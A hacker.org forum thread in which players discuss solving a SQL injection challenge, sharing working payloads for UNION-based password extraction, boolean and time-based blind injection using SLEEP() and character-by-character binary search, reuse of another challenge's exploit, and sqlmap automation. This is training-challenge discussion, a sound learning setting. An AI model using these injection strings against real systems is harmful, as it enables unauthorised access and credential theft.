Page 1 of 1
Inscrutable
Posted: Thu Dec 11, 2008 9:23 pm
by MerickOWA
Very enjoyable series of problems
I knew the idea of sql injection but never actually attempted to use it before. Was a neat lesson, I'd be curious as to what causes the
Unknown column 'grtPW4h4ck3rzYO' in 'where clause'
If you use
' UNION SELECT password FROM user --
as the name on the "Forced Entry" page. I was happy to see the password in the plain text, but have no idea what php code caused that error.
Posted: Thu Dec 11, 2008 9:27 pm
by MerickOWA
I ended up writing a program to do a binary search on each character of the password. Was really kinda fun
Just goes to show you what is possible even without any error messages and a little bit of guess work.
Posted: Thu Dec 11, 2008 10:08 pm
by gfoot
I think a binary search is the right way to do this. What did you use for feedback? The idea was to not give any visible feedback on success, failure, or unparsability of the query. I think there ended up being a few holes though.
Posted: Thu Dec 11, 2008 10:41 pm
by MerickOWA
I used 'logged in' as feedback.
Basically I made the sql query that was being constructed search for a bogus username, then tacked on a union select which always gave the result 'test' and conditionalized it with a WHERE and a sub query which grabbed the password for root, stripped out a particular character and tested to see if it was below a particular number.
If it failed that test, my union select failed and returned no results which meant i got a error, otherwise I got the result 'test' which matched the query and got a 'logged in' result.
Posted: Wed Jan 21, 2009 12:28 pm
by efe
I simply used the response time as feedback for my binary search.
The SLEEP() function is very useful for this.
BENCHMARK() could also be used but this function is not allowed here.
Posted: Sun Jul 05, 2009 3:33 am
by therethinker
I tried using binary search something wierd happened and I got "uifmvwuibucvsot". So I ended up doing it by hand. On the last one I did "binary" search by hand (but not really binary, more like 10's). So I used LIKE '% %' to figure out all the characters that were in it (thankfully all lowercase!) then I used it to start from 1 and expand.
Example:
root' AND password LIKE 'th%' UNION SELECT '1
And 1 as the password.
Posted: Mon Nov 23, 2009 2:33 am
by tails
Hi!
MerickOWA, I guess the code is like:
SELECT id FROM user WHERE name = '$name'
SELECT password FROM user WHERE id = $id
Posted: Wed Jan 20, 2010 10:11 pm
by ffaadd
hi,
nice challange. I've learned new techniques to get response from SQL-Injections.
I've done this with something like that
Code: Select all
root' AND IF(ASCII(SUBSTRING(password,$x,1))=$n,SLEEP(2),1) or 1='1
$x is the postion of the character an $n is the ascii-code.
ciao,
ffaadd
Posted: Sun Dec 25, 2011 11:32 pm
by harvestsnow
Hello,
For the injection, I used
Code: Select all
'UNION SELECT (ASCII(SUBSTR(password, $index,1))>>$shift)&1 FROM user where name='root'#
, with 1 as password.
And there's a way to get the source of the page, I don't know if it's intended.
Posted: Fri Nov 02, 2012 9:49 pm
by dangermouse
some UNION hints here do not work anymore...
i did like the others with manual binary search using ASCII(), LENGTH(), SUBSTR() and lot of count(*). i also used yes/no questions on the information_schema table to retrieve the right table and schema
i wonder if there is some good tool to automate all this yes/no stuff?
anyway, nice challenge!
Posted: Thu Jan 03, 2013 10:24 am
by Roogley
dangermouse wrote:i wonder if there is some good tool to automate all this yes/no stuff?
Just take a look at
sqlmap.
But since we're on hacker.org, what about cheating and just re-using the Fort Knox exploit?
I used the following username on
Fort Knox:
Code: Select all
' UNION SELECT password FROM injecto2.user#
Posted: Tue Mar 12, 2013 6:51 pm
by haellowyyn
I had exactly the same idea as Roogley. Since all three challenges are on the same database server, you can simply retrieve the password from one of the former challenges. sqlmap makes that ridiculously easy.
Posted: Wed Mar 27, 2013 12:02 am
by gandhi
sqlmap reveald vulnerability for time based injection.
used following string for the user field:
root' and if((select mid(password,16,1) from user limit 0,1)='z',sleep(10),1) AND 'kzQg'='kzqg’
--------------------------------------------------------------------x------x
and a script to loop through the alphabet and the positions of the password
Posted: Wed Mar 27, 2013 1:00 am
by aurora
gandhi wrote:sqlmap reveald vulnerability for time based injection.
used following string for the user field:
root' and if((select mid(password,16,1) from user limit 0,1)='z',sleep(10),1) AND 'kzQg'='kzqg’
--------------------------------------------------------------------x------x
and a script to loop through the alphabet and the positions of the password
i let sqlmap do the rest, too
... was very interesting to see, how powerful sqlmap is.
Posted: Tue Aug 05, 2014 3:22 pm
by destiny
Very nice challenge since I never knew about time based attacks. I used sqlmap to help me confirm my suspicions about sleep() and I found a nice article (
http://www.rafayhackingarticles.net/201 ... based.html) explaining how to exploit it
Edit: now I see that I could have done this easily with the dump option in sqlmap, but it was good to understand how it works rather than just by magic